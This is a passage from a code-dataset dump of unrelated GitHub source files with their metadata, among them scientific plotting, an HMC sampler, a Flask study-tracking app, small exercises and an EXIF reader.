Roman:italic'\nmpl.rcParams['mathtext.bf'] = 'Times New Roman:bold'\n\n\ndef pipeline_filter(modify_x,N,P,filepath=\"../data/capital coordination/capital coordination.shp\"): \n \n coord=gpd.read_file(filepath)\n coord.set_index('index', inplace=True)\n \n pipeline=gpd.GeoDataFrame(index=[(i,j) for i in order for j in order ],columns=[\"start province\",\"end province\",\"capacity_n\",\"capacity_p\",\"geometry\",\"ifbuildh2\"],crs=\"EPSG:4326\")\n pipeline.geometry=pipeline.index.to_series().apply(lambda x: LineString([coord.geometry[x[0]],coord.geometry[x[1]]]))\n pipeline[\"start province\"]=pipeline.index.to_series().apply(lambda x: x[0])\n pipeline[\"end province\"]=pipeline.index.to_series().apply(lambda x: x[1])\n pipeline.capacity_n=pipeline.index.to_series().apply(lambda x: N[x[0],x[1]].X)\n pipeline.capacity_p=pipeline.index.to_series().apply(lambda x: P[x[0],x[1]].X)\n pipeline[\"ifbuildh2\"]=pipeline.index.to_series().apply(lambda y: modify_x.loc[y[0],y[1]])\n return pipeline,coord\n\n\n\n\ndef draw_sankey(modify_x,N,P,filepath_china=\"../data/china-shapefiles/china.shp\",filepath_nine=\"../data/china-shapefiles/china_nine_dotted_line.shp\"):\n china = gpd.read_file(filepath_china,encoding='utf-8') \n china = china.dissolve(by='OWNER').reset_index(drop=False) # 由于每行数据是单独的面,因此按照其省份列OWNER融合\n nine_lines = gpd.read_file(filepath_nine,encoding='utf-8')\n fig = plt.figure(figsize=(8.3/2, 6),dpi=300)\n ax = plt.axes([0,0,1,1]) #左下角x坐标,左下角y坐标,宽度,高度(0~1,归一化了)\n albers_proj = '+proj=aea +lat_1=25 +lat_2=47 +lon_0=105'\n ax = china.geometry.to_crs(albers_proj).plot(ax=ax,\n facecolor='grey',\n edgecolor='white',\n linestyle='--',\n alpha=0.8)\n ax = nine_lines.geometry.to_crs(albers_proj).plot(ax=ax,\n edgecolor='grey',\n linewidth=1,\n alpha=0.4)\n ax.axis('off') # 移除坐标轴\n \n pipeline,coord=pipeline_filter(modify_x,N,P)\n pipeline=pipeline.to_crs(albers_proj)\n pipe_h2=pipeline[pipeline[\"ifbuildh2\"]>0]\n pipe_h2=pipe_h2.set_geometry(\"geometry\")\n for i in range(len(pipe_h2)):\n pipe=pipe_h2.iloc[i] \n base=pipe[\"capacity_p\"]/pipe_h2[\"capacity_p\"].max()\n ax.annotate(\"\",\n xy=pipe.geometry.coords[1],\n xytext=pipe.geometry.coords[0],\n size=5, \n va=\"center\",\n ha=\"center\",\n arrowprops=dict(connectionstyle=\"arc3\", # for straight line, rad=0\n edgecolor='none',\n width=base*4, headwidth=base*10,headlength=base*10)\n )\n \n x_text=(pipe.geometry.coords[1][0]+pipe.geometry.coords[0][0])/2\n y_text=(pipe.geometry.coords[1][1]+pipe.geometry.coords[0][1])/2\n ax.text(x_text,y_text,'{:.1f}'.format(pipe[\"capacity_p\"]/1000000),fontsize=3)\n coord.to_crs(albers_proj).plot(ax=ax, color='green', markersize=50, marker='.')\n fig.suptitle('Pure hydrogen pipeline distribution of China in 2060 ', fontsize=12, fontweight='bold')\n ax.set_title('Capacity unit:million ton')\n return ax\n\n\n","repo_name":"cecicxy/Hydrogen-pipeline-network","sub_path":"code/visualization.py","file_name":"visualization.py","file_ext":"py","file_size_in_byte":4005,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19771938777","text":"\"\"\"Implementation for Hamiltonian Monte Carlo (HMC) sampling.\"\"\"\n# pylint: disable=E1101\nimport typing as t\n\nimport autograd\nimport autograd.numpy as np\n\n\ndef hmc(initial_theta: np.ndarray,\n target_logpdf: t.Callable[[np.ndarray], float],\n num_samples: int = 200,\n num_leapfrog_steps: int = 50,\n step_size: float = 0.1,\n burnout_frac: float = 0.5,\n random_state: t.Optional[int] = None,\n verbose: bool = False,\n return_acc_rate: bool = False\n ) -> t.Union[np.ndarray, t.Tuple[np.ndarray, float]]:\n \"\"\"Hamiltonian Monte Carlo implementation.\n\n Arguments\n ---------\n initial_theta : :obj:`np.ndarray`\n Initial values for the Markov Chain.\n\n target_logpdf : :obj:`t.Callable`\n Log-density target function. Must receive a :obj:`np.ndarray`\n as the first argument, and return the natural (base-e) logarithm\n of the probability density evaluated at the given point as the\n argument.\n\n num_samples : :obj:`int`, optional\n Number of instances to sample.\n\n num_leapfrog_steps : :obj:`int`, optional\n Number of ``leapfrog`` steps for every sample.\n\n step_size : :obj:`float`, optional\n Also known as ``epsilon`` parameter. Affects the step size of\n each ``leapfrog`` step.\n\n burnout_frac : :obj:`float`, optional\n Fraction of initial samples to ignore. Must be a :obj:`float`\n value in [0, 1) range. Used to minimize the influence of the\n ``initial_theta`` value on the samples. More precisely, the\n np.ceil(num_samples * burnout_frac) first instances will be\n ignored before returning the samples.\n\n random_state : :obj:`int`, optional\n If not None, set numpy random seed before the first HMC\n sampling.\n\n verbose : :obj:`bool`, optional\n Enable priting of additional information about the HMC process.\n\n return_acc_rate : :obj:`bool`, optional\n If True, return also the acceptance rate of the HMC process.\n\n Returns\n -------\n :obj:`np.ndarray`\n HMC samples.\n\n Notes\n -----\n Works only for unimodal targets. Need to implement parallel\n tempering for multimodal targets.\n \"\"\"\n\n def calc_total_energy(momentum: np.ndarray,\n theta_logtarget: float) -> float:\n \"\"\"Calculates the total energy of the current position on HMC process.\"\"\"\n energy_kinetic = 0.5 * np.dot(momentum, momentum)\n energy_potential = -theta_logtarget\n energy_total = energy_kinetic + energy_potential\n return energy_total\n\n def leapfrog_integration(\n theta: np.ndarray, theta_grad: np.ndarray,\n momentum: np.ndarray) -> t.Tuple[np.ndarray, np.ndarray]:\n \"\"\"Perform Leapfrog Integration.\"\"\"\n theta_new = theta\n grad_new = theta_grad\n\n for _ in np.arange(num_leapfrog_steps):\n momentum += step_size * 0.5 * grad_new\n theta_new += step_size * momentum\n grad_new = grad_fun(theta_new)\n momentum += step_size * 0.5 * grad_new\n\n return theta_new, grad_new\n\n if not 0 <= burnout_frac < 1:\n raise ValueError(\"'burnout_frac' must be in [0, 1) interval.\")\n\n if not isinstance(initial_theta, np.ndarray):\n initial_theta = np.array(initial_theta)\n\n if random_state is not None:\n np.random.seed(random_state)\n\n thetas = np.zeros((num_samples, initial_theta.size))\n grad_fun = autograd.grad(target_logpdf)\n\n theta_cur = np.copy(initial_theta)\n theta_cur_grad = grad_fun(theta_cur)\n theta_logtarget_cur = target_logpdf(theta_cur)\n hits = 0\n\n for sample_id in np.arange(num_samples):\n momentum = np.random.randn(theta_cur.size)\n total_energy_initial = calc_total_energy(\n momentum=momentum, theta_logtarget=theta_logtarget_cur)\n\n theta_new, grad_new = leapfrog_integration(\n theta=theta_cur, theta_grad=theta_cur_grad, momentum=momentum)\n\n theta_logtarget_new = target_logpdf(theta_new)\n total_energy_final = calc_total_energy(\n momentum=momentum, theta_logtarget=theta_logtarget_new)\n\n delta_energy = total_energy_initial - total_energy_final\n if np.log(np.random.uniform(0, 1)) < delta_energy:\n theta_cur = theta_new\n theta_cur_grad = grad_new\n theta_logtarget_cur = theta_logtarget_new\n hits += 1\n\n thetas[sample_id, :] = theta_cur\n\n acc_rate = hits / num_samples\n\n if verbose:\n print(\"Acceptance ratio: {:.4f}\".format(acc_rate))\n print(\"Theoretically expected: [0.6, 0.8] (results may be {}.)\"\n .format(\"optimal\" if 0.6 <= acc_rate <= 0.8 else \"not optimal\"))\n\n burnout_ind = int(np.ceil(num_samples * burnout_frac))\n thetas = thetas[burnout_ind:]\n\n if return_acc_rate:\n return thetas, acc_rate\n\n return thetas\n\n\ndef _test():\n import matplotlib.pyplot as plt\n random_state = 32\n\n def log_sphere(theta):\n return -20 * np.square(np.linalg.norm(theta, ord=2) - 10)\n\n thetas = hmc(\n initial_theta=[3.0, 0.0],\n target_logpdf=log_sphere,\n random_state=random_state,\n num_leapfrog_steps=50,\n step_size=0.2,\n verbose=True)\n\n print(\"Sampled {} instances.\".format(thetas.shape[0]))\n plt.plot(thetas[:, 0], thetas[:, 1])\n plt.show()\n\n\nif __name__ == \"__main__\":\n _test()\n","repo_name":"FelSiq/statistics-related","sub_path":"dist_sampling_and_related_stats/hamiltonian_monte_carlo.py","file_name":"hamiltonian_monte_carlo.py","file_ext":"py","file_size_in_byte":5439,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"18288000457","text":"from frames.abstract_frame import AbstractFrame\nfrom frames.builders.chan_thread_builder import ChanThreadBuilder\n\nclass ThreadFrame(AbstractFrame, ChanThreadBuilder):\n def __init__(self, boardString, threadNumber, urwidViewManager, uFilter = None):\n super().__init__(urwidViewManager, uFilter)\n\n self.boardString = boardString\n self.threadNumber = threadNumber\n\n self.threadWidgetDict = {}\n\n self.url = 'https://a.4cdn.org' + self.boardString + 'thread/' + str(self.threadNumber) + '.json'\n # self.imageUrl = 'http://boards.4chan.org' + self.boardString + 'thread/' + str(self.threadNumber)\n self.imgPrefix = 'https://i.4cdn.org'\n self.headers = {}\n\n self.postReplyDict = {}\n\n self.load()\n self.headerString = f'TerminusBrowser - 4chan: {self.boardString} -- {str(self.threadNumber)}'\n\n if self.url in self.uvm.watched:\n self.uvm.watched[self.url]['numReplies'] = len(self.comments)\n\n # Overrides super\n def loader(self):\n self.comments = self.getJSONThread()\n self.contents = self.buildFrame()\n","repo_name":"wtheisen/TerminusBrowser","sub_path":"src/frames/fchan/thread_frame.py","file_name":"thread_frame.py","file_ext":"py","file_size_in_byte":1114,"program_lang":"python","lang":"en","doc_type":"code","stars":121,"dataset":"github-code","pt":"21"} +{"seq_id":"73523400691","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Feb 10 23:29:15 2019\n\n@author: Hillel Awaskar\n\"\"\"\n\nimport wikipedia, os\nfrom wordcloud import WordCloud, STOPWORDS\ncurr_path = \"C:\\\\Users\\\\Irene\\\\Natural-Language-Processing\\\\\"\n\nstopwords = set(STOPWORDS)\n\ndef get_wiki_content(query):\n title = wikipedia.search(query)[0]\n page = wikipedia.page(title)\n return page.content\n\ndef beautiful_wordcloud(text):\n sw = set(STOPWORDS)\n wc = WordCloud(background_color=\"white\", \n max_words = 200,\n max_font_size=40, \n scale=3,\n stopwords = sw)\n WordCloud()\n wc.generate(text)\n wc.to_file(os.path.join(curr_path, \"word_cld.png\"))\n \n\nbeautiful_wordcloud(get_wiki_content(\"Mauryan Empire\"))\n\n","repo_name":"hillelawaskar/Natural-Language-Processing","sub_path":"NLP_Learn3_word_cloud.py","file_name":"NLP_Learn3_word_cloud.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2063518229","text":"from menu import Menu, MenuItem\nfrom coffee_maker import CoffeeMaker\nfrom money_machine import MoneyMachine\n\n\ncashier = MoneyMachine()\nbarista = CoffeeMaker()\nmenu = Menu()\n\nturned_on = True\n\nwhile turned_on:\n choice = \"\"\n while not choice:\n choice = input(f\"What would you like? ({menu.get_items()}): >\")\n if choice != \"report\" and choice != \"off\":\n choice = menu.find_drink(choice)\n elif choice == \"report\":\n barista.report()\n cashier.report()\n choice = \"\"\n continue\n elif choice == \"off\":\n turned_on = False\n break\n else:\n pass\n if barista.is_resource_sufficient(choice) and cashier.make_payment(choice.cost):\n barista.make_coffee(choice)\n","repo_name":"desaga/oop-barista","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37088996871","text":"\n###############################################################################\n# Code : Pagination\n# Author : Arun Kumar R\n# Description : Send the particular no of data from bulk amount of data\n# Create Date : 09-02-2019\n# Version : 1.0\n###############################################################################\n# Change log\n###############################################################################\n# Date Version Details Edited by\n# 2019-02-09 1.0 Inital Version Arun Kumar R\n###############################################################################\nfrom django.core.paginator import Paginator\nfrom superuser import models\nfrom django.db.models import Sum, Q\nfrom django.contrib.auth.models import User\n\n\nclass Pagination(object):\n\n def __init__(self):\n self.page = None\n self.no_of_data = None\n self.queryset = None\n self.empty_list = list()\n\n def pagination(self, page, no_of_data, queryset, **kwargs):\n self.page = int(page)\n self.no_of_data = no_of_data\n self.queryset = eval(queryset)\n data = Paginator(self.queryset, self.no_of_data)\n if data.num_pages >= self.page:\n paginted_data = data.page(self.page).object_list\n return paginted_data\n else:\n return self.empty_list\n","repo_name":"pmvenkat/AjaxCRUD","sub_path":"superuser/pagination.py","file_name":"pagination.py","file_ext":"py","file_size_in_byte":1387,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"32017693031","text":"## import modules here \n\n################# Question 0 #################\n\n\ndef add(a, b): # do not change the heading of the function\n return a + b\n\n\n################# Question 1 #################\n\ndef nsqrt(x): # do not change the heading of the function\n low = 0\n mid = 0\n up = x + 1\n flag = False\n while not flag:\n mid = (low + up) // 2\n if mid ** 2 <= x < (mid + 1) ** 2:\n flag = True\n else:\n if mid ** 2 > x:\n up = mid\n else:\n low = mid\n return mid\n\n\n################# Question 2 #################\n\n\n# x_0: initial guess\n# EPSILON: stop when abs(x - x_new) < EPSILON\n# MAX_ITER: maximum number of iterations\n\n## NOTE: you must use the default values of the above parameters, do not change them\n\ndef find_root(f, fprime, x_0=1.0, EPSILON=1E-7, MAX_ITER=1000): # do not change the heading of the function\n x = x_0\n x_new = x_0 - f(x_0)/fprime(x_0)\n count_iter = 1\n while abs(x_new - x) >= EPSILON and count_iter < MAX_ITER:\n x = x_new\n x_new = x - f(x)/fprime(x)\n count_iter += 1\n return x_new\n\n\n################# Question 3 #################\n\nclass Tree(object):\n def __init__(self, name='ROOT', children=None):\n self.name = name\n self.children = []\n if children is not None:\n for child in children:\n self.add_child(child)\n\n def __repr__(self):\n return self.name\n\n def add_child(self, node):\n assert isinstance(node, Tree)\n self.children.append(node)\n\n\ndef make_tree(tokens): # do not change the heading of the function\n assert len(tokens) > 0\n tmp_stack = []\n tmp_tree = Tree(tokens[0])\n tmp_stack.append(tmp_tree)\n for token in tokens[2:-1]:\n if token == '[':\n tmp_stack.append(tmp_tree)\n elif token == ']':\n tmp_stack.pop()\n else:\n tmp_tree = Tree(token)\n tmp_stack[-1].add_child(tmp_tree)\n return tmp_stack[-1]\n\n\ndef max_depth(root): # do not change the heading of the function\n if len(root.children) == 0:\n return 1\n else:\n return max([1 + max_depth(i) for i in root.children])\n\n\n\n# if __name__ == \"__main__\":\n# ## test question 1\n# # print(nsqrt(1))\n# # print(nsqrt(11))\n# # print(nsqrt(1369))\n# #\n# ## test question 2\n# # def f(x):\n# # return x * math.log(x) - 16.0\n# #\n# # def fprime(x):\n# # return 1.0 + math.log(x)\n# #\n# # x = find_root(f, fprime)\n# # print(x)\n# # print(f(x))\n#\n# # test question 3-1\n# def print_tree(root, indent=0):\n# print(' ' * indent, root)\n# if len(root.children) > 0:\n# for child in root.children:\n# print_tree(child, indent + 4)\n#\n# toks = ['1', '[', '2', '[', '3', '4', '5', ']', '6', '[', '7', '8', '[', '9', ']', '10', '[', '11', '12', ']', ']', '13', ']']\n# tt = make_tree(toks)\n# print_tree(tt)\n#\n# ## test question 3-2\n# depth = max_depth(tt)\n# print(depth)\n# pass\n","repo_name":"SoIomon/LC_Homework","sub_path":"Lab1_specs/submission.py","file_name":"submission.py","file_ext":"py","file_size_in_byte":3083,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21448333328","text":"# Testa se três inteiros formam uma progressão aritmética ou geométrica\r\nprint ('Progressão Aritmética ou Geométrica')\r\n\r\na = float(input('Digite um inteiro a: '))\r\nb = float(input('Digite um inteiro b: '))\r\nc = float(input('Digite um inteiro c: '))\r\n\r\n# se a distância/diferença entre a e b é a mesma que entre b e c,\r\n# temos um PA (progressão aritmética)\r\nif b-a == c-b:\r\n print('a, b e c formam uma Progressão Aritmética de razão {:.2f}.'\r\n .format(b-a))\r\nelse:\r\n print('a, b e c NÃO formam uma Progressão Aritmética.')\r\n \r\n# se a ou b tiverem valor zero, não é possível que seja\r\n# uma progressão geométrica, então finaliza o programa\r\nif a==0 or b==0: exit()\r\n\r\n# se a proporção/razao entre a e b é a mesma que entre b e c,\r\n# temos um PG (progressão geométrica)\r\nif b/a == c/b:\r\n print('a, b e c formam uma Progressão Geométrica de razão {:f}.'\r\n .format(b/a))\r\nelse:\r\n print('a, b e c NÃO formam uma Progressão Geométrica.')\r\n \r\n\r\n","repo_name":"pjandl/opy1","sub_path":"Dia_2/progressaoAritmetica.py","file_name":"progressaoAritmetica.py","file_ext":"py","file_size_in_byte":1010,"program_lang":"python","lang":"pt","doc_type":"code","stars":21,"dataset":"github-code","pt":"21"} +{"seq_id":"3754371522","text":"from collections import defaultdict\n\ndef solution(tickets):\n answer = []\n # 인접리스트 생성\n def init():\n route = defaultdict(list)\n for key, value in tickets:\n route[key].append(value)\n return route\n \n def dfs():\n stack = ['ICN']\n path = []\n while len(stack) > 0: # 스택이 빌때까지\n top = stack[-1]\n # top 위치에서 출발하는 티켓이 없거나 티켓을 다 썼을 때\n if top not in route or len(route[top]) == 0:\n path.append(stack.pop())\n else:\n stack.append(route[top].pop(0))\n return path[::-1] # 거꾸로 출력\n \n route = init()\n for r in route:\n route[r].sort()\n answer = dfs()\n \n return answer","repo_name":"KB-team3/AlgoGGang","sub_path":"곽승규/Week_14/P43164_여행경로.py","file_name":"P43164_여행경로.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"ko","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"13345545095","text":"from flask import render_template, flash, request, url_for, redirect, abort, session, Markup\nfrom flask_login import login_user, current_user, logout_user, login_required\nfrom flask_mail import Message\nfrom application import app, bcrypt, mail, login_manager\nfrom application.classes.user import User\nfrom application.classes.session import Session\nfrom application.forms.forms import RegistrationForm, LoginForm\n\nfrom utils import plot_overall_mood, blink_rate_graph, get_blink_rate, get_blink_ratio, current_blink_rate, calc_focus_values, update_focus_value, update_focus_plots, get_mood, get_overall_mood, plot_moods\nfrom io import BytesIO \nfrom io import StringIO\nfrom PIL import Image\n\nfrom datetime import datetime\nimport os \nimport json \nimport re\nimport time\nimport numpy as np\nimport cv2\nfrom bson import ObjectId\nimport base64\n\n@login_manager.user_loader\ndef load_user(user_id):\n user_id = str(user_id)\n return User.get_by_id(user_id)\n\n@app.route(\"/home\", methods=[\"GET\", \"POST\"])\n@app.route(\"/\", methods=[\"GET\", \"POST\"])\ndef home():\n print(current_user.is_authenticated)\n return render_template(\"home.html\")\n\n@app.route(\"/start-session\")\ndef start_session():\n return render_template(\"start_session.html\")\n\n@app.route(\"/end-session/\")\ndef end_session(session_id):\n # current_session = current_user.get_session_by_id(session_id)\n # current_user.update_session(session_id, end_time=datetime.now, total_time=datetime.now() - current_session.start_time)\n\n return render_template(\"end_session.html\")\n\n@app.route(\"/session\", methods=[\"GET\", \"POST\"])\ndef session():\n if current_user.id == \"5fd5651341432c9630f95c8e\":\n current_session = current_user.get_session_by_id('5fd63ac9921dc84394b08bda')\n session_id = current_session.id\n header = \"\"\n else:\n current_session = Session(id=str(ObjectId()), start_time=datetime.now())\n current_user.add_session(current_session)\n session_id = current_session.id\n header = \"Currently Unavailable for Standard Users, Sample Data Displayed\"\n return render_template(\"session.html\", session_id=session_id, header=header)\n\n@login_required\n@app.route(\"/account\")\ndef account():\n user = current_user\n sessions = current_user.sessions\n info = [[session.start_time.strftime('%I:%M')] for session in sessions]\n return render_template(\"account.html\", user=user, sessions=sessions, info=info)\n\n@app.route(\"/register\", methods=[\"GET\", \"POST\"])\ndef register():\n form = RegistrationForm()\n \n print(form.email.data, form.password.data, form.confirm_password.data, form.validate_on_submit())\n\n if form.validate_on_submit():\n hashed_pw = bcrypt.generate_password_hash(form.password.data).decode('utf-8')\n user = User(id=str(ObjectId()), email=form.email.data, password=hashed_pw, _is_active=True, sessions=[])\n user.add()\n flash('Your account has been created', 'success')\n return redirect('login')\n\n return render_template(\"register.html\", form=form)\n\n@app.route(\"/login\", methods=[\"GET\", \"POST\"])\ndef login():\n form = LoginForm()\n\n if form.validate_on_submit():\n user = User.get_by_email(form.email.data)\n print(user)\n if user and bcrypt.check_password_hash(user.password, form.password.data):\n login_user(user)\n next_page = request.args.get('next')\n if next_page:\n return redirect(next_page)\n else:\n return redirect(url_for('home'))\n else:\n flash(\"Login Unsuccessful. Please check email and password\", 'danger')\n \n return render_template(\"login.html\", form=form)\n\n@app.route(\"/focus\", methods=[\"GET\", \"POST\"])\ndef focus():\n data_url = request.values['image']\n img_64 = data_url.replace(\"data:image/png;base64,\", \"\")\n png_as_np = np.frombuffer(base64.b64decode(img_64), dtype=np.uint8)\n print(png_as_np.shape)\n image_buffer = cv2.imdecode(png_as_np, cv2.IMREAD_COLOR)\n cv2.imwrite(\"b64out.png\",image_buffer)\n\n \n\n # nparr = np.fromstring(img_bytes, np.uint8)\n # print(nparr.shape)\n # img_np = cv2.imdecode(nparr, cv2.IMREAD_COLOR)\n # print(\"SHAPE\", img_np.shape)\n\n return {\"status\": \"failure\"}, 200\n\n # img = Image.open(BytesIO(img_bytes))\n # img = np.array(img)\n # print(img.shape)\n\n # session_id = request.get_json().get(\"id\")\n # session = current_user.get_session_by_id(session_id)\n # img_64 = request.get_json().get(\"img\")\n \n # img_bytes = base64.b64decode(img_64)\n # img = Image.open(BytesIO(img_bytes))\n # img = np.array(img)\n # print(img)\n # cv2.imshow(img)\n\n\n # print(len(img_64))\n # decoded = base64.b64decode(img_64)\n # img_np = np.frombuffer(decoded, np.uint8)\n # print(img_np.shape)\n # img = cv2.imdecode(img_np, cv2.IMREAD_COLOR)\n # print(img is None)\n\n # focus, ratio = focus_method(img, session.focus, session.ratios)\n\n # current_user.update_session(session_id, {\"focus\": session.focus.append(focus), \"ratio\": session.ratios.append(ratio)})\n\n # value = display_focus_value(focus, len(session.focus))\n\n # print(value)\n # return value\n\n@app.route(\"/strain\")\ndef strain():\n session_id = request.args.get(\"id\")\n session = current_user.get_session_by_id(session_id)\n img_64 = request.args.get(\"img\")\n img, time = None, 0\n \n blinks = get_blink_rate(img, time, 7, session.blinks)\n blink_rate = current_blink_rate(blinks, 10, time)\n\n current_user.update_session(session_id, {\"blinks\": session.blinks, \"blink_rate\": session.blink_rate.append(blink_rate)})\n\n print(\"HERE\")\n return \"hi\"\n\n@app.route(\"/mood\")\ndef mood():\n session_id = request.args.get(\"id\")\n session = current_user.get_session_by_id(session_id)\n img_64 = request.args.get(\"img\")\n img = img_64.decode('base64')\n\n mood = get_mood(img)\n current_user.update_session(session_id, {\"mood\": session.mood.append(mood)})\n\n print(\"HERE\")\n return \"hi\"\n\n@app.route(\"/focus-line/\")\ndef focus_line(session_id):\n session = current_user.get_session_by_id(session_id)\n line, _ = update_focus_plots(session.focus, session.ratios)\n return line\n\n@app.route(\"/focus-heat/\")\ndef focus_heat(session_id):\n session = current_user.get_session_by_id(session_id)\n _, heat = update_focus_plots(session.focus, session.ratios)\n return heat\n\n@app.route(\"/mood-line/\")\ndef mood_line(session_id):\n session = current_user.get_session_by_id(session_id)\n line = plot_overall_mood(session.mood)\n return line\n\n@app.route(\"/mood-pie/\")\ndef mood_pie(session_id):\n session = current_user.get_session_by_id(session_id)\n pie = plot_moods(session.mood[-1])\n return pie\n\n@app.route(\"/strain-line/\")\ndef strain_line(session_id):\n session = current_user.get_session_by_id(session_id)\n line = blink_rate_graph(session.blink_rate, 25)\n return line\n\n@app.route(\"/logout\")\n@login_required\ndef logout():\n logout_user()\n return redirect(url_for('home'))","repo_name":"ronnachum11/StudyVision","sub_path":"application/routes/main_routes.py","file_name":"main_routes.py","file_ext":"py","file_size_in_byte":7084,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"1624881356","text":"#!/usr/bin/python3\n\nfrom PIL import Image\nfrom PIL.ExifTags import TAGS\n\n# path to the image or video\nimagename = \"image.jpg\"\n\n# read the image data using PIL\nimage = Image.open(imagename)\n\n# extract EXIF data\nexifdata = image.getexif()\n\n# iterating over all EXIF data fields\nfor tag_id in exifdata:\n # get the tag name, instead of human unreadable tag id\n tag = TAGS.get(tag_id, tag_id)\n data = exifdata.get(tag_id)\n # decode bytes \n if isinstance(data, bytes):\n data = data.decode('latin-1')\n print(f\"{tag:25}: {data}\")\n","repo_name":"johto89/Some-command-for-security","sub_path":"exifimage.py","file_name":"exifimage.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"21"} +{"seq_id":"37945242527","text":"#!python3\n\nimport fileinput\nimport re\nfrom collections import defaultdict, Counter\nimport sys\nfrom enum import Enum\nfrom itertools import islice\n\nlines = map(lambda x: x.strip(), fileinput.input())\n\ncounts = Counter()\n\nfor line in lines:\n x1, y1, x2, y2 = re.match(r\"(\\d+),(\\d+) -> (\\d+),(\\d+)\", line).groups()\n if x1 != x2 and y1 != y2:\n print(\"\\tskip\", x1, y1, \"->\", x2, y2)\n continue\n x1 = int(x1)\n x2 = int(x2)\n y1 = int(y1)\n y2 = int(y2)\n if x1 > x2:\n x1, x2 = x2, x1\n if y1 > y2:\n y1, y2 = y2, y1\n\n counts.update({(x, y): 1 for x in range(x1, x2 + 1) for y in range(y1, y2 + 1)})\n\n# didn't bother printing anything but the example\nfor y in range(10):\n for x in range(10):\n c = counts[(x, y)]\n print(c if c > 0 else \".\", end=\"\")\n print()\n\nintersections = 0\nfor coords, count in counts.items():\n if count > 1:\n intersections += 1\n\nprint(intersections)\n","repo_name":"abersnaze/advent","sub_path":"2021/day5/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37763743026","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated by Simon Melgaard and Kamilla Andersen\r\n\r\nA function for creating a model for the airflow of a fan from its datasheet (air flow as a function of rotation speed and pressure over the fan)\r\n\"\"\"\r\n\r\nfrom scipy.optimize import curve_fit\r\nimport numpy as np\r\n\r\n\r\ndef calc_air_flow(fan_spec_rot_speed,fan_spec_pressure,fan_spec_flow,fan_signal,fan_spec_max_rot_speed,fan_pressure_difference):\r\n def func(data,a,b,c,d,e):\r\n x=data[0]\r\n y=data[1]\r\n return (x**a)*b+(y**c)*d+(x*y)**e\r\n\r\n initial_param=[1,1,0.5,-50,1]\r\n popt,pcov = curve_fit(func,[fan_spec_rot_speed, fan_spec_pressure],fan_spec_flow,p0=initial_param)\r\n \r\n print('fitted parameters', popt)\r\n \r\n modelPredictions = func([fan_spec_rot_speed, fan_spec_pressure], *popt) \r\n\r\n absError = modelPredictions - fan_spec_flow\r\n SE = np.square(absError) # squared errors\r\n MSE = np.mean(SE) # mean squared errors\r\n RMSE = np.sqrt(MSE) # Root Mean Squared Error, RMSE\r\n Rsquared = 1.0 - (np.var(absError) / np.var(fan_spec_flow))\r\n CVRMSE = RMSE/np.mean(fan_spec_flow)\r\n print('RMSE:', RMSE)\r\n print('CVRMSE:', CVRMSE*100, '%')\r\n print('R-squared:', Rsquared)\r\n \r\n\r\n return func([fan_signal*fan_spec_max_rot_speed/100,fan_pressure_difference], *popt)/60","repo_name":"aauphd2024/CLIMA22_data_code","sub_path":"Python_scripts/AHU/Air_flow_calculation_over_fan.py","file_name":"Air_flow_calculation_over_fan.py","file_ext":"py","file_size_in_byte":1323,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37219862681","text":"class Solution:\n def bestHand(self, ranks: 'List[int]', suits: 'List[str]') -> str: # O( N | N )\n r_cnt = defaultdict(lambda:0)\n s_cnt = defaultdict(lambda:0)\n for r in ranks:\n r_cnt[r] +=1\n for s in suits:\n s_cnt[s] += 1\n \n r_mx = max(r_cnt.values()) #max rank value\n \n if len(s_cnt) == 1: # all five cards with same suit\n return \"Flush\" \n elif r_mx >= 3: # at least 3 cards of same rank\n return \"Three of a Kind\"\n elif r_mx >= 2: # at least 2 cars with same rank\n return \"Pair\" \n else: # other situation\n return \"High Card\"\n\n\n\n ","repo_name":"renjieliu/leetcode","sub_path":"2000_2499/2347.py","file_name":"2347.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"71575721334","text":"# -*- coding: utf-8 -*-\n\nimport numpy as np\nfrom numpy import sum as nsum\nfrom numpy import add as nadd\nfrom numpy import zeros as zeros\nfrom numpy import nonzero\nfrom numpy import int32 as nint32, uint32 as nuint32\nfrom numpy.random import binomial\nfrom numpy.random import multinomial\n\nfrom hankshaw import genome\n\n\nclass Population(object):\n \"\"\"Represent a population within a metapopulation\n\n A population is a collection of individuals. Each individual is represented\n by a number. The binary representation of that number defines that\n individual's genotype. The state of the highest order bit determines whether\n (1) or not (0) that individual is a producer.\n\n * genome_length: the length of the genome. The production allele is added to\n this, so the number of genotypes is 2^(genome_length+1)\n * stress_survival_rate: the probability of an individual surviving a change\n of environment (stress)\n * mutation_rate_social: the probability of a mutation (bit flip) occuring at\n the social locus\n * mutation_rate_adaptation: the probability of a mutation (bit flip) at a\n non-social locus\n * capacity_min: the minimum size of a fully-grown population. This occurs\n when there are no producers\n * capacity_max: the maximum size of a fully-grown population. This occurs\n when a population consists entirely of producers\n * production_cost: the fitness cost of production. This manifests itself as\n a decrease in growth rate\n * initialize: How to initialize the population\n empty: the population will have no individuals\n\n\n \"\"\"\n\n def __init__(self, metapopulation, config):\n \"\"\"Initialize a 